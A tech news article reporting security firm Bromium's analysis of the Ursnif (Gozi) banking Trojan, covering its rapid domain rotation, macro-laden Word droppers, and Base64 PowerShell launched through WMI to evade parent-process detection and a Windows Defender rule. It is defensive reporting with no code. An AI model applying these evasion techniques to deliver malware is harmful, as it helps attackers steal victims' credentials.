View all newsletters
Receive our newsletter - data, insights and analysis delivered to you

This Malware Moves Delivery Infrastructure Every 12 Hours

"Only one domain reputation service had classified the Ursnif delivery domain as malicious"

By CBR Staff Writer

The Trojan Ursnif (also known as Gozi) is getting increasingly sophisticated, researchers at security company Bromium say, with their latest analysis showing the malware changing its delivery infrastructure as rapidly as every 12 hours, making it exceptionally hard for perimeter security controls that rely on a traditional detection-based techniques little time to block the download of the malware.

The credential-stealing Trojan is, alongside Emotet, one of the most pervasive and effective malware families. (Italian security firm Yoroi describes it as a “fork of the original Gozi-ISFB banking Trojan” the source code of which leaked in 2014.

Ursnif use weaponised Microsoft Office documents with a VBA macro embedded that act as a dropper, and multi-stage, highly obfuscated powershell scripts in order to hide the real payload. Ursnif also uses steganography to hide the malicious code.

Ursnif Evading “Malicious” Domain Classification by Moving Domains in Less than 12 Hours

The the report by Bromium says Ursnif’s operators are increasingly linking different techniques together to “effectively socially engineer targets, evade perimeter detection and bypass one of Windows Defender’s attack surface reduction rules” while using a rapidly shifting delivery infrastructure to evade detection.

The shift to a rapidly changing delivery infrastructure stands out: “Our research found that the average time from the registration of a domain used to host Ursnif executables to when a user first runs the corresponding Word dropper is less than 12 hours.”


Obligatory hooded hacker stock image.

Bromium noted: “The speed at which Ursnif’s operators can change its infrastructure gives web proxies and other perimeter security controls that rely on a traditional detection-based techniques little time to block the download of the malware. ”

“In one example, only one domain reputation service had classified the Ursnif delivery domain as malicious at the time when the Word dropper was run.”

Content from our partners
Green for go: Transforming trade in the UK
Manufacturers are switching to personalised customer experience amid fierce competition
How many ends in end-to-end service orchestration?

See also: Is It Finally Bromium’s Hour?

The latest sample analysed by Bromium contains an obfuscated VBA AutoOpen macro, which runs each time the document is opened. The document uses the common trick of requesting the user to enable macros, if they are not already enabled.

“The macro runs a Base64 encoded PowerShell command using the Win32_Process and Win32_ProcessStartup WMI classes. The resulting PowerShell instance is run as a child process of WmiPrvSe.exe (WMI Provider Host). This benefits the adversary by defeating detection techniques that rely on parent-child process relationships because the parent process ID of the Ursnif executable will be the process ID of WmiPrvSe.exe.”

“In our testing on Windows 10 Enterprise 1809, we found that this technique is effective at bypassing the Windows Defender attack surface reduction rule that blocks Office applications from creating child processes. In some of the samples, this was used in conjunction with a COM technique that also spoofed the parent process ID of the Ursnif process”, Bromium’s Alex Holland wrote.

(The company noted that endpoints that are running Bromium Secure Platform are protected from this threat because each user task, such as opening an Office document or clicking a malicious link, is run in its own isolated micro-virtual machine.)

Read this: Endpoint Security: A Sceptic’s Guide

Websites in our network
Select and enter your corporate email address Tech Monitor's research, insight and analysis examines the frontiers of digital transformation to help tech leaders navigate the future. Our Changelog newsletter delivers our best work to your inbox every week.
  • CIO
  • CTO
  • CISO
  • CSO
  • CFO
  • CDO
  • CEO
  • Architect Founder
  • MD
  • Director
  • Manager
  • Other
Visit our privacy policy for more information about our services, how New Statesman Media Group may use, process and share your personal data, including information on your rights in respect of your personal data and how you can unsubscribe from future marketing communications. Our services are intended for corporate subscribers and you warrant that the email address submitted is your corporate email address.